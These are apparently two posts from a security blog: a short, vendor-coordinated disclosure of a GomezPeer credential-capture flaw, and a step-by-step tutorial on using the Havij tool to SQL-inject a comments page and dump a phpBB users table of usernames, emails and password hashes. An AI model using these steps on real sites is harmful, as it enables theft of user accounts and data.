Gomez Peer Exploit |

Introduction:

I decided to take a look at how GomezPeer works from a low level view. During my observations I was surprised how someone would very easily be able to grab username and login info from cooperate websites in a passive manner while running the application.

What is GomezPeer: (in brief)

For those of you who don’t know GomezPeer is a public peer application that is run in order for Dynatrace to test out website responsiveness. Dynatrace claims it is #1 in application performance management.

What gomezpeer does is pays clients to run the application and instruction sets on their own PC so that vendors can measure end user performance of their sites. Such examples could be log in and order plane tickets, or execute a database queries against a server to see how long it will take to return the data in different areas of the country or world. This allows them to test a large number of OSs and ISPs and locations without needing to have the cost of the infrastructure in place. Peers are compensated anywhere between 5$ and 40$ per month and can choose to donate the amount to charity. Over the last few months GomezPeer has been slowly re branding its application into Dynatrace. Both GomezPeer and Dynatrace are owned by Compuware.

Both GomezPeer and Dynatrace use the same addressing block.

Gomez Advisor PNAP-BSN-GOMEZ-RM-02 (NET-63-251-134-0-1) 63.251.134.0 – 63.251.134.255

How GomezPeer works:
Gomez peer is installed on a client and then activated by putting in a username that corresponds to a GomezPeerZone account. You can install as many peers as you like on as many physical hosts in order to increase your earnings.

The Exploit:

The original documentation on it has been pulled at the request of the vendor.

After working with the vendor the exploit has been mitigated and GomezPeer has been hardened in order to be more resilient to such attacks. The Dynatrace team has been very quick to respond to the issue and let the affected clients know.

I also found working with the project managers at Dynatrace easy to communicate with while working out the specifics and I thank them for that.

SQL Injection Basics | How I learned how point and click attacks are easy.

After watching Troy Hunts Yow! Conference I was inspired to try the great SQL injection. This technique is known for getting mass password lists \ email addresses from forum sites. This is a two part guide with this being the first part. Part two covers what do with the data once you have it.

Disclaimer – Tests were conducted internally as far as you need to believe and by reading past this line you remove me from any liability regarding you and the use of the tools with the provided information below. See below for your very vintage reminder that 14 year olds go to jail every year for doing this kind of shit.

be8

 

Question: Can I use SQL injection to get usernames and passwords?
How can I test for SQL Injection?
What is a good app for those who dont understand what SQL is or how injection works?
What is SQL injection?

 Answer:  Yes you can get usernames and passwords in a plaintext (if provided and poorly stored manner), hashed , and salted variety.
There are many paid services for testing SQL injection that will be better than the one demoed here for free, but you cant beat free.
We are going to use Havij 1.15 for testing SQL injection.
In brief SQL Injection is when input is not sanitized on incoming request and thus allowing someone to insert a question (query) before the data is sent back to the user.

Here is your super basic break down of SQL injection. A user goes to site that they want to attempt to SQL inject. They look for some kind of SQL element on the page (Logins, php? forms ties to DBs, Forums, Comments, etc). Once they find that element they will attempt to pass erroneous data to to it and see how it responds. If it shows a error that looks like a SQL error or table of data you have likely scored as SQL is telling you the problem something it shouldn’t do.  So lets get to this!

First locate your internal site you are allowed to test that I’m sure your all here to read and learn about. Here is mine straight from the 1990’s. I see there is a comments section that has my appropriate string.

www.site.com/comments.php?id=4

 

s1

Perfect now we need to test it, lets add a simple ‘ to the end of it and try again.

s2

Perfect we just got a warning from SQL about the GET request. so lets take our new string

http://mysite.com/comments.php?id=4′

and throw it into Havij. this app will give us a logical view of the DB including a tree view of the tables and columns. In other words it will show what can be seen publicly. Havij comes in two flavors Free and Pro and can be readily found on google. I will not be linking it from this article as there is no official source repo.

s3

 

Then click on Analyze and it will attempt to fingerprint the database and interface with it. The log console will show you any information you need. If you see it running iterations then it has probably failed or the query can not be injected. Check the status field, here we can see my successful injection.

s4

Now you want to click Tables and Get DBs to list all the available DBs on the server.

s5

s6

 

Ok, so there are 3 types of data fields we can query, Databases the root folders you see here these are usually based off service or used to logically sort data think of it like a folder called \music\ . Tables the first sub folder these are used to sort the data within the database much like if you have \music\techno\ they usually contain sets of columns like privileges and group settings. Then we have Columns these are the actual values, these columns would be items like post dates / times, ids, GUIDs, usernames, and passwords, they would be similar to \music\techno\Gemini – Blue .

When using Havij you need to do it from a top down structure allow it to find all the Databases first, then pick one database and Get Tables until you see what table you want to Get Columns from.

Here is an example of a few phpBB database using Get Tables.

phpbb_users
phpbb_privmsgs
phpbb_topics

I am going to use phpbb_users as my example table to Get Columns from. Checkbox the single table and choose Get Columns.

s7

new data will be populated and you will see it as another sub category. Select the data you want its best to just choose a few at first. These will be unique for the service but this example specifically is target to phpBB. For the example I chose:

user_id – a number tied to the user, gives us a idea of the size of the userbase
username – the login
user_email – the account registrant address
user_password – their hashed and salted password
user_form_salt – some kind of initial salt for logins or account creation not sure

There are various other items like user_ip that would have been interesting as well.

s8

 

But wait I thought you said I could get some passwords from this! Well there grasshopper, we need to establish the fact that no one should be storing passwords in cleartext on the server this is bad practice and phpBB does not do this. Im going to explain how to reverse this in the next post. But for now lets go ahead and save this using the Save Data button and make sure its a easy to read HTML file.

Congratulations you are just as badass as those 14 year olds out there running a muck on the internet. But your one more step closer to understand how this attack works and what could happen in the event you have a leak of your DB.

I would just like to point out this is a very basic representation on how to do this. The software used is doing all the heavy lifting if you would look into programming and testing for such a thing I would recommend taking a course on SQL and reviewing the commands in the console output of Havij also known as ‘carrot’

Now that you have learned the basics its time to grab a copy of SQLmap and learn how to do it the proper way. Havij is really just a easy way to test out a site.